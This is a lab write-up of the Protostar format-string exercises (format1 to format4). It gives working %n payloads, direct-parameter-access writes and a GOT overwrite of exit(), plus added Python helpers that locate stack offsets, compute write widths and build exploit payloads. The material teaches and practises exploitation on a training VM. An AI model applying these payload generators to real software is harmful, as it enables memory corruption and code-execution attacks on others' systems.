Exploit Exercises - Format String

Format1:
Pad with "%x." until the target address (0x08049638) is the last word dumped; the "AAABB" filler just makes the address easy to spot in the output:
run `python -c 'print "\x38\x96\x04\x08"+"AAABB"+"%x."*143'`%x
Write: once the address shows up as the last word, swap the final %x for %n so printf writes its byte count there:
run `python -c 'print "\x38\x96\x04\x08"+"AAABB"+"%x."*143'`%n
DMA (direct parameter access): the same write with a single %142$n; the two leading "CC" bytes re-align the address onto a 4-byte stack word, and "AAA" is filler:
/opt/protostar/bin/format1 `python -c 'print "CC"+"\x38\x96\x04\x08"+"AAA%142$n"'`
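Counting "%x." fields by eye is error-prone, so here is an added Python 3 example (not from the page, whose one-liners are Python 2 on the Protostar VM) that builds the page's probe, parses a printf dump to find the parameter index for %N$n, tells you how many prefix bytes are needed when the address straddles two stack words (the reason for the "CC" above), and assembles the DMA write. The dump texts inside it are constructed to have the shape of format1's output, not captured from the binary, and the helper names are mine.

```python
"""Find the printf parameter index where our input lands, then build the %N$n write.

Added example, not the page's own tooling. The sample dumps below are
constructed (shaped like format1's "%x." output, but shorter); the function
names are mine.
"""
import struct

TARGET = 0x08049638          # format1's target, from the page's payload bytes

# Constructed dumps, NOT real format1 output. In ALIGNED_DUMP the address is
# field 5; in SHIFTED_DUMP our string starts one byte into a stack word, so the
# address is split across fields 5 and 6 (little-endian: 0x049638?? then 0x??????08).
ALIGNED_DUMP = "804960c.bffff5a0.b7fd8420.bffff7e8.8049638.42414141.2e782542.252e7825."
SHIFTED_DUMP = "804960c.bffff5a0.b7fd8420.bffff7e8.4963800.41414108.2e784242.252e7825."


def probe(addr, count=143):
    """The page's probe: the address, 'AAABB' filler, then `count` times '%x.'.

    The trailing '%x' or '%n' that the page appends outside the quotes is
    left to the caller (it becomes field count+1).
    """
    return struct.pack("<I", addr) + b"AAABB" + b"%x." * count


def locate(dump, addr):
    """Return (field_index, prefix_len) for `addr` in a '%x.'-separated dump.

    field_index is the 1-based '%x.' field holding the address (field 1 is
    parameter 1, so it doubles as the N in %N$n). prefix_len is how many
    filler bytes to put in front of the address so it starts on a 4-byte
    word: 0 when it already does. Returns None if the address is not visible
    at all (dump more fields). printf's %x prints no leading zeros, so
    fields are compared as integers, not strings.
    """
    fields = dump.split(".")
    for i, field in enumerate(fields, start=1):
        try:
            val = int(field, 16)
        except ValueError:           # empty trailing field or other junk
            continue
        if val == addr:
            return i, 0
        # Address starts s bytes into this word: the word's upper bytes are the
        # address's low bytes, and the next word's low bytes hold the rest.
        nxt = int(fields[i], 16) if i < len(fields) and fields[i] else 0
        for s in (1, 2, 3):
            low_part = addr & ((1 << (32 - 8 * s)) - 1)
            high_part = addr >> (32 - 8 * s)
            if val >> (8 * s) == low_part and nxt & ((1 << (8 * s)) - 1) == high_part:
                return i, 4 - s
    return None


def dma_write(addr, index, prefix=b"", filler=b"AAA"):
    """Direct-parameter-access write in the page's layout: alignment prefix,
    the address, filler, then %<index>$n, which stores printf's byte count
    (a small nonzero number, which is all format1 needs) at the address.
    Keep the total length identical to the probe you measured with, since
    argv[1] lives at the top of the stack and a different length can move it.
    """
    return prefix + struct.pack("<I", addr) + filler + b"%%%d$n" % index


if __name__ == "__main__":
    print(probe(TARGET, 3))
    print(locate(ALIGNED_DUMP, TARGET))   # (5, 0): aligned, use %5$n
    print(locate(SHIFTED_DUMP, TARGET))   # (5, 3): add 3 prefix bytes, re-probe
    print(dma_write(TARGET, 142, prefix=b"CC"))
```

Usage on the VM would be: run the program with `probe(TARGET)` as argv[1], feed the printed dump to `locate`, and if the prefix length is nonzero add that many bytes in front of the address and probe again before building the final `dma_write` payload, because shifting the string changes which word it starts in.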
Format2: need to write the value 64 (0x40) to the target address 0x080496e4. The input comes from stdin, so the payload is piped in:
POC:
python -c 'print "\xe4\x96\x04\x08%42x"+"%x."*2+"%n"' > foo
Layout of the payload: | address | enough padding (%Nx) that printf's byte count reaches the value | %n |

DMA: the 4 address bytes plus a field width of 60 make the count exactly 64 when %4$n fires:
python -c 'print "\xe4\x96\x04\x08"+"%60u%4$n"' | /opt/protostar/bin/format2

Format3: write a 4-byte value, one byte at a time, to the four consecutive addresses 0x080496f4..0x080496f7:

Each %n stores the running byte count; only its low byte matters for the address it lands on, and every later write also overwrites the higher bytes left by the previous one, so the writes go in increasing address order. The "BB" and "B" fillers keep each following address on a 4-byte stack word. The widths (%11x, %475x, ...) were tuned against the live dump, since the unwidthed %x conversions print a variable number of characters.

POC:

python -c 'print "\xf4\x96\x04\x08"+"%x"*10+"%11x%n"+"BB"+"\xf5\x96\x04\x08"+"%x"*6+"%475x%n"+"B"+"\xf6\x96\x04\x08"+"%x"*4+"%136x%n"+"B"+"\xf7\x96\x04\x08"+"%x"*3+"%482x%n"'

Format 4: we need to overwrite a GOT entry.

--> Overwrite the GOT entry of exit() at 0x08049724 (the four addresses in the payload) with the address of hello(), 0x080484b4, so the exit() call after printf() jumps into hello() instead. Same byte-by-byte technique as format3, but with direct parameter access (%4$n .. %7$n) the widths can be computed instead of tuned:

python -c 'print "\x24\x97\x04\x08"+"\x25\x97\x04\x08"+"\x26\x97\x04\x08"+"\x27\x97\x04\x08"+"%164x%4$n%208x%5$n%128x%6$n%260x%7$n"' > pro4_dma

Nice trick to calculate the field widths

Each %n stores the number of bytes printed so far, and for a byte-by-byte write only the low byte of that count matters. So for every byte of the value to write, subtract the count already printed; when the result is negative, or too small to hold the %x output (a 32-bit stack word can print up to 8 characters, so a width of 4 would overshoot), add 0x100 first. The 16 bytes of addresses are printed before the first %n, hence the 0x10:

user@protostar:/opt/protostar/bin$ gdb -q
(gdb) p 0xb4 - 0x00000010
$1 = 164
(gdb) p 0x84 - 0xb4
$2 = -48
(gdb) p 0x184 - 0xb4
$3 = 208
(gdb) p 0x04 - 0x84
$4 = -128
(gdb) p 0x104 - 0x84
$5 = 128
(gdb) p 0x08 - 0x04
$6 = 4
(gdb) p 0x108 - 0x04
$7 = 260

So 0xb4, 0x84, 0x04, 0x08 are the bytes of 0x080484b4, lowest first: take each byte of the value to write, subtract the bytes already printed, and the result is the field width.
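The subtraction above, as an added Python 3 example (not the page's own tooling) that reproduces the four format4 widths, builds the format2 single-write and format4 byte-write payloads shown on this page, and emulates printf's byte counter to check a payload before sending it. The emulator is a model, not printf: it assumes every widthed %u/%x prints exactly its width (true for widths of 8 or more on 32-bit words). The helper names, the 8-character minimum width, and the value and parameter index used in the format3-style demonstration are my assumptions.

```python
"""Field widths and payloads for %n writes (added example, not the page's code).

Each %<k>$n stores the number of bytes printf has emitted so far. For a
byte-by-byte write only the low byte of that count matters, so each width is
"wanted byte minus bytes already printed", plus 0x100 whenever that would be
negative or too small to hold the %x output. Names here are my own.
"""
import re
import struct

MIN_WIDTH = 8   # assumption: a %x of a 32-bit stack word prints up to 8 chars,
                # so a smaller width would not pad and the count would overshoot


def single_write_width(value, printed, min_width=MIN_WIDTH):
    """Width for one %<w>u%<k>$n that makes the count equal `value` (format2)."""
    w = value - printed
    if w < min_width:
        raise ValueError("value too small to reach with one write")
    return w


def write_widths(value, printed, nbytes=4, min_width=MIN_WIDTH):
    """Widths for nbytes successive %n writes, lowest byte first (format3/4).

    `printed` is the number of bytes already output before the first %n (the
    address words). Mirrors the gdb arithmetic: 0xb4-0x10, 0x184-0xb4, ...
    """
    widths, count = [], printed
    for i in range(nbytes):
        want = (value >> (8 * i)) & 0xFF
        w = (want - count) % 256      # subtract, adding 0x100 when negative
        while w < min_width:          # 0x08-0x04 = 4 is too small: use 260
            w += 256
        widths.append(w)
        count += w
    return widths


def single_write_payload(addr, value, index):
    """format2 shape: address, then %<w>u%<index>$n; the 4 address bytes count too."""
    head = struct.pack("<I", addr)
    return head + b"%%%du%%%d$n" % (single_write_width(value, len(head)), index)


def byte_write_payload(addr, value, first_index, nbytes=4):
    """format4 shape: nbytes consecutive addresses, then %<w>x%<k>$n per byte.

    Like the page it mixes unnumbered %<w>x with numbered %<k>$n, which glibc
    accepts; strictly, C leaves that mix undefined.
    """
    head = b"".join(struct.pack("<I", addr + i) for i in range(nbytes))
    out = head
    for i, w in enumerate(write_widths(value, len(head), nbytes)):
        out += b"%%%dx%%%d$n" % (w, first_index + i)
    return out


_CONV = re.compile(rb"%(\d+)[ux]%(\d+)\$n")


def emulate(payload, addr, first_index, head_len, nbytes=4):
    """Model of printf's counter over a payload built above (not real printf).

    head_len is the number of address bytes printed before the first
    conversion. Every %<w>u/x is assumed to print exactly w bytes, and each
    %<k>$n stores the 4-byte counter at the (k - first_index)-th address.
    Returns (word now stored at addr, addresses clobbered beyond the target):
    the last byte write drags 3 bytes of counter past the target, which for
    a GOT entry means the next slot.
    """
    mem = {}
    count = head_len
    for w, k in _CONV.findall(payload):
        count += int(w)
        dest = addr + (int(k) - first_index)
        for j in range(4):            # %n writes a whole int, little-endian
            mem[dest + j] = (count >> (8 * j)) & 0xFF
    word = sum(mem.get(addr + j, 0) << (8 * j) for j in range(nbytes))
    spill = sorted(a for a in mem if a >= addr + nbytes)
    return word, spill


if __name__ == "__main__":
    print(write_widths(0x080484B4, 16))                     # format4 widths
    print(single_write_payload(0x080496E4, 64, 4))          # format2 payload
    p4 = byte_write_payload(0x08049724, 0x080484B4, 4)      # format4 payload
    print(p4)
    print([hex(x) for x in emulate(p4, 0x08049724, 4, 16)[1]])  # clobbered bytes
    # format3-style check with an assumed value and parameter index
    p3 = byte_write_payload(0x080496F4, 0x01025544, 12)
    print(hex(emulate(p3, 0x080496F4, 12, 16)[0]))
```

The emulation of the format4 payload reports 0x08049728..0x0804972a as clobbered: the %7$n write stores a full int at 0x08049727, so the low three bytes of the next GOT slot become 0x000003. That is harmless here because hello() never returns to exit(), but it is the check to run before aiming the same technique at a slot whose neighbour is still needed.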

----------------------------------------------------------
Thanks for reading
--------------------------------------------------------------------------
Security Research
SecurityLab - Linux Lab -- Windows and Cisco Lab
to be continued - I will update more.

Nam Habach